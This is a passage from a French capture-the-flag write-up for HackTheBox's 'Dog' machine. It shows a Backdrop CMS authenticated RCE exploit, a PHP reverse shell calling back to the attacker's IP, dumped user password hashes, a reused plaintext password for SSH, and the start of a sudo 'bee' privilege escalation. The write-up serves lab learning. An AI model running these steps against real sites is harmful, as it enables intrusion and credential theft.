class="p">;</span> </span></span><span class="line"><span class="cl">website/core/includes/install.inc:491: <span class="nv">$database</span> <span class="o">=</span> <span class="nv">$modified_connection_info</span><span class="o">[</span><span class="s1">&#39;default&#39;</span><span class="o">][</span><span class="s1">&#39;database&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl">website/core/includes/install.inc:796: <span class="nv">$database</span> <span class="o">=</span> NULL<span class="p">;</span> </span></span><span class="line"><span class="cl">website/core/includes/install.core.inc:904: <span class="nv">$database</span> <span class="o">=</span> <span class="nv">$databases</span><span class="o">[</span><span class="s1">&#39;default&#39;</span><span class="o">][</span><span class="s1">&#39;default&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl">website/core/includes/install.core.inc:973: <span class="nv">$database</span> <span class="o">=</span> isset<span class="o">(</span><span class="nv">$databases</span><span class="o">[</span><span class="s1">&#39;default&#39;</span><span class="o">][</span><span class="s1">&#39;default&#39;</span><span class="o">])</span> ? <span class="nv">$databases</span><span class="o">[</span><span class="s1">&#39;default&#39;</span><span class="o">][</span><span class="s1">&#39;default&#39;</span><span class="o">]</span> : array<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl">website/core/includes/install.core.inc:1022: <span class="nv">$database</span> <span class="o">=</span> <span class="nv">$form_state</span><span class="o">[</span><span class="s1">&#39;values&#39;</span><span class="o">][</span><span class="nv">$driver</span><span class="o">]</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="tiffany">Tiffany </h3><blockquote> <p>&ldquo;<a class="link" href="mailto:tiffany@dog.htb" >tiffany@dog.htb</a>&rdquo;</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog/website<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ grep -rni <span class="s2">&#34;@dog.htb&#34;</span> </span></span><span class="line"><span class="cl">.git/logs/HEAD:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root &lt;dog@dog.htb&gt; <span class="m">1738963331</span> +0000 commit <span class="o">(</span>initial<span class="o">)</span>: todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases </span></span><span class="line"><span class="cl">.git/logs/refs/heads/master:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root &lt;dog@dog.htb&gt; <span class="m">1738963331</span> +0000 commit <span class="o">(</span>initial<span class="o">)</span>: todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases </span></span><span class="line"><span class="cl">files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12: <span class="s2">&#34;tiffany@dog.htb&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="backdrop-cms---authenticated-rce">Backdrop CMS - Authenticated RCE </h3><p>Grâce au compte administrateur de tiffany, on va pouvoir exploiter une RCE de backdrop CMS v1.27.1 et uploader un fichier shell.php :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ searchsploit backdrop cms </span></span><span class="line"><span class="cl">--------------------------------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">--------------------------------------------------------- </span></span><span class="line"><span class="cl">Backdrop CMS 1.20.0 - <span class="s1">&#39;Multiple&#39;</span> Cross-Site Request Forgery <span class="o">(</span>CSRF<span class="o">)</span> <span class="p">|</span> php/webapps/50323.html </span></span><span class="line"><span class="cl">Backdrop CMS 1.23.0 - Stored XSS <span class="p">|</span> php/webapps/51905.txt </span></span><span class="line"><span class="cl">Backdrop CMS 1.27.1 - Authenticated Remote Command Execution <span class="o">(</span>RCE<span class="o">)</span> <span class="p">|</span> php/webapps/52021.py </span></span><span class="line"><span class="cl">Backdrop Cms v1.25.1 - Stored Cross-Site Scripting <span class="o">(</span>XSS<span class="o">)</span> <span class="p">|</span> php/webapps/51597.txt </span></span><span class="line"><span class="cl">--------------------------------------------------------- </span></span><span class="line"><span class="cl">Shellcodes: No Results </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ searchsploit -m php/webapps/52021.py </span></span><span class="line"><span class="cl"> Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution <span class="o">(</span>RCE<span class="o">)</span> </span></span><span class="line"><span class="cl"> URL: https://www.exploit-db.com/exploits/52021 </span></span><span class="line"><span class="cl"> Path: /usr/share/exploitdb/exploits/php/webapps/52021.py </span></span><span class="line"><span class="cl"> Codes: N/A </span></span><span class="line"><span class="cl"> Verified: True </span></span><span class="line"><span class="cl">File Type: Python script, Unicode text, UTF-8 text executable </span></span><span class="line"><span class="cl">Copied to: /home/kali/htb/Dog/52021.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ mv 52021.py RCE.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 RCE.py http//dog.htb </span></span><span class="line"><span class="cl">Backdrop CMS 1.27.1 - Remote Command Execution Exploit </span></span><span class="line"><span class="cl">Evil module generating... </span></span><span class="line"><span class="cl">Evil module generated! shell.zip </span></span><span class="line"><span class="cl">Go to http//dog.htb/admin/modules/install and upload the shell.zip <span class="k">for</span> Manual Installation. </span></span><span class="line"><span class="cl">Your shell address: http//dog.htb/modules/shell/shell.php </span></span></code></pre></td></tr></table> </div> </div><p>Quand on va a l&rsquo;addresse specifier pour installer le module avec le code malicieux, on trouve un message :</p> <blockquote> <p>The Zip PHP extension is not loaded on your server. You will not be able to download any projects using Project Installer until this is fixed. Impossible donc d&rsquo;installer un module .zip comme le propose l&rsquo;exploit. Cependant, on trouve un bouton un peu plus bas : Manual Installation Upload a module Ensuite on met notre zip mais on a: The specified file shell.zip could not be uploaded. Only files with the following extensions are allowed: tar tgz gz bz2. On remplace donc notre .zip par un .tar : ça fonctionne ! Notre code php est bien présent à l&rsquo;addresse spécifié par l&rsquo;exploit python: http//dog.htb/modules/shell/shell.php</p> </blockquote> <p>Pour obtenir un reverse shell stable facilement, on va uploader directement un code php &lsquo;php-reverse-shell.php&rsquo; provenant de github en modifiant notre ip et port:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## php-reverse-shell.php</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">set_time_limit <span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">&#34;1.0&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$ip</span> <span class="o">=</span> <span class="s1">&#39;10.10.14.10&#39;</span><span class="p">;</span> // CHANGE THIS </span></span><span class="line"><span class="cl"><span class="nv">$port</span> <span class="o">=</span> 1337<span class="p">;</span> // CHANGE THIS </span></span><span class="line"><span class="cl"><span class="nv">$chunk_size</span> <span class="o">=</span> 1400<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$write_a</span> <span class="o">=</span> null<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$error_a</span> <span class="o">=</span> null<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$shell</span> <span class="o">=</span> <span class="s1">&#39;uname -a; w; id; /bin/sh -i&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$daemon</span> <span class="o">=</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$debug</span> <span class="o">=</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On obtient un shell en tant que www-data :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Firefox</span> </span></span><span class="line"><span class="cl">http://dog.htb/modules/shell/shell.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.58<span class="o">]</span> <span class="m">46688</span> </span></span><span class="line"><span class="cl">Linux dog 5.4.0-208-generic <span class="c1">#228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 14:57:07 up 17:27, <span class="m">0</span> users, load average: 0.05, 0.03, 0.00 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">www-data@dog:/$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@dog:/$ ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@dog:/$ whoami </span></span><span class="line"><span class="cl">www-data </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---johncusack">www-data -&gt; johncusack </h2><h3 id="mysql-connection">Mysql connection </h3><p>On peut se connecter a la base de données mysql rapidement avec les credentials trouvés précédemment:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@dog:/$ mysql -u root -p </span></span><span class="line"><span class="cl">Enter password: </span></span><span class="line"><span class="cl">Welcome to the MySQL monitor. Commands end with <span class="p">;</span> or <span class="se">\g</span>. </span></span><span class="line"><span class="cl">Your MySQL connection id is <span class="m">12917</span> </span></span><span class="line"><span class="cl">Server version: 8.0.41-0ubuntu0.20.04.1 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> 2000, 2025, Oracle and/or its affiliates. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Oracle is a registered trademark of Oracle Corporation and/or its </span></span><span class="line"><span class="cl">affiliates. Other names may be trademarks of their respective </span></span><span class="line"><span class="cl">owners. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Type <span class="s1">&#39;help;&#39;</span> or <span class="s1">&#39;\h&#39;</span> <span class="k">for</span> help. Type <span class="s1">&#39;\c&#39;</span> to clear the current input statement. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; use backdrop<span class="p">;</span> </span></span><span class="line"><span class="cl">Reading table information <span class="k">for</span> completion of table and column names </span></span><span class="line"><span class="cl">You can turn off this feature to get a quicker startup with -A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database changed </span></span><span class="line"><span class="cl">mysql&gt; <span class="k">select</span> name,pass,mail from users<span class="p">;</span> </span></span><span class="line"><span class="cl">+-------------------+---------------------------------------------------------+----------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> name <span class="p">|</span> pass <span class="p">|</span> mail <span class="p">|</span> </span></span><span class="line"><span class="cl">+-------------------+---------------------------------------------------------+----------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> jPAdminB <span class="p">|</span> <span class="nv">$S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T</span>./ffdEr/. <span class="p">|</span> jPAdminB@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> jobert <span class="p">|</span> <span class="nv">$S$E</span>/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 <span class="p">|</span> jobert@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> dogBackDropSystem <span class="p">|</span> <span class="nv">$S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD</span> <span class="p">|</span> dogBackDroopSystem@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> john <span class="p">|</span> <span class="nv">$S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n</span>/OTdQBFklAji. <span class="p">|</span> john@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> morris <span class="p">|</span> <span class="nv">$S$E8OFpwBUqy</span>/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS <span class="p">|</span> morris@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> axel <span class="p">|</span> <span class="nv">$S$E</span>/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV <span class="p">|</span> axel@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> rosa <span class="p">|</span> <span class="nv">$S$EsV26QVPbF</span>.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT <span class="p">|</span> rosa@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> tiffany <span class="p">|</span> <span class="nv">$S$EEAGFzd8HSQ</span>/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v <span class="p">|</span> tiffany@dog.htb <span class="p">|</span> </span></span><span class="line"><span class="cl">+-------------------+---------------------------------------------------------+----------------------------+ </span></span><span class="line"><span class="cl"><span class="m">9</span> rows in <span class="nb">set</span> <span class="o">(</span>0.00 sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="john-jobert---hashcat-bruteforce-passwords">john, jobert - hashcat bruteforce passwords </h3><p>On a les users suivant pouvant avoir un shell sur le serveur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@dog:/$ cat /etc/passwd <span class="p">|</span> grep sh$ </span></span><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">jobert:x:1000:1000:jobert:/home/jobert:/bin/bash </span></span><span class="line"><span class="cl">johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash </span></span></code></pre></td></tr></table> </div> </div><p>On va donc tenter de cracker en priorité les mots de passe de jobert et de john, à l&rsquo;aide de hashcat:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">$S$E</span>/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 </span></span><span class="line"><span class="cl"><span class="nv">$S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n</span>/OTdQBFklAji. </span></span></code></pre></td></tr></table> </div> </div><p>Aucun résultat avec rockyou ! On abandonne cette piste (Meme pour les autres hachage)</p> <h3 id="johncusack">johncusack </h3><p>En essayant toujours le meme mot de passe: <code>BackDropJ2024DS2024</code> avec john, ça fonctionne ! On peut ensuite se connecter en ssh avec cet utilisateur sur la machine linux :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh johncusack@dog.htb </span></span><span class="line"><span class="cl">The authenticity of host <span class="s1">&#39;dog.htb (10.10.11.58)&#39;</span> can<span class="s1">&#39;t be established. </span></span></span><span class="line"><span class="cl"><span class="s1">ED25519 key fingerprint is SHA256:M3A+wMdtWP0tBPvp9OcRf6sPPmPmjfgNphodr912r1o. </span></span></span><span class="line"><span class="cl"><span class="s1">This key is not known by any other names. </span></span></span><span class="line"><span class="cl"><span class="s1">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes </span></span></span><span class="line"><span class="cl"><span class="s1">Warning: Permanently added &#39;</span>dog.htb<span class="s1">&#39; (ED25519) to the list of known hosts. </span></span></span><span class="line"><span class="cl"><span class="s1">johncusack@dog.htb&#39;</span>s password: &lt;------------ BackDropJ2024DS2024 </span></span><span class="line"><span class="cl">Welcome to Ubuntu 20.04.6 LTS <span class="o">(</span>GNU/Linux 5.4.0-208-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by </span></span><span class="line"><span class="cl">applicable law. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Sun Mar <span class="m">9</span> 08:36:06 <span class="m">2025</span> from 10.10.14.2 </span></span><span class="line"><span class="cl">johncusack@dog:~$ whoami </span></span><span class="line"><span class="cl">johncusack </span></span><span class="line"><span class="cl">johncusack@dog:~$ cat user.txt </span></span><span class="line"><span class="cl">cb5b.....1388 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege escalation </h2><h3 id="johncusack--bee-as-superuser">johncusack : &lsquo;bee&rsquo; as superuser </h3><p>On peut executer le binaire &ldquo;/usr/local/bin/bee&rdquo; en tant que super utilisateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">johncusack@dog:~$ sudo -l </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> johncusack: </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> johncusack on dog: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User johncusack may run the following commands on dog: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL : ALL<span class="o">)</span> /usr/local/bin/bee </span></span></code></pre></td></tr></table> </div> </div><p>On regarde les options pour la commande bee :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">johncusack@dog:/var/www/html$ sudo bee </span></span><span class="line"><span class="cl">🐝 Bee </span></span><span class="line"><span class="cl">Usage: bee <span class="o">[</span>global-options<span class="o">]</span> &lt;command&gt; <span class="o">[</span>options<span class="o">]</span> <span class="o">[</span>arguments<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Global Options: </span></span><span class="line"><span class="cl"> --root </span></span><span class="line"><span class="cl"> Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> --site </span></span><span class="line"><span class="cl"> Specify the directory name or URL of the Backdrop site to use <span class="o">(</span>as defined in <span class="s1">&#39;sites.php&#39;</span><span class="o">)</span>. If not set, will try to find the Backdrop site automatically based on the current directory. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ADVANCED </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nb">eval</span> </span></span><span class="line"><span class="cl"> ev, php-eval </span></span><span class="line"><span class="cl"> Evaluate <span class="o">(</span>run/execute<span class="o">)</span> arbitrary PHP code after bootstrapping Backdrop. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> php-script </span></span><span class="line"><span class="cl"> scr </span></span><span class="line"><span class="cl"> Execute an arbitrary PHP file after bootstrapping Backdrop. </span></span></code></pre></td></tr></table> </div> </div><p>En regardant de plus près, on trouve deux options intéressantes :</p> <ul> <li>eval</li> <li>php-script</li> </ul> <p>On essaye d&rsquo;abord php-script qui semble prendre un fichier php en parametre et l&rsquo;execute :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">johncusack@dog:/var/www/html$ sudo bee php-script </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ✘ Argument <span class="s1">&#39;file&#39;</span> is required. </span></span></code></pre></td></tr></table> </div> </div><p>On essaye alors de créer un revershell php &lsquo;shell.php&rsquo; et de le passer en parametre:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">johncusack@dog:~/.temp$ ls </span></span><span class="line"><span class="cl">shell.php </span></span><span class="line"><span class="cl">johncusack@dog:~/.temp$ sudo bee php-script shell.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ✘ The required bootstrap level <span class="k">for</span> <span class="s1">&#39;php-script&#39;</span> is not ready. </span></span></code></pre></td></tr></table> </div> </div><p>On reçoit un message d&rsquo;erreur. Après reflexion, l&rsquo;idée me vient d&rsquo;executer un fichier php dans le dossier où se trouve les fichiers php du web server. Peut être que cela peuvent etre modifié et executé ensuite ?</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span 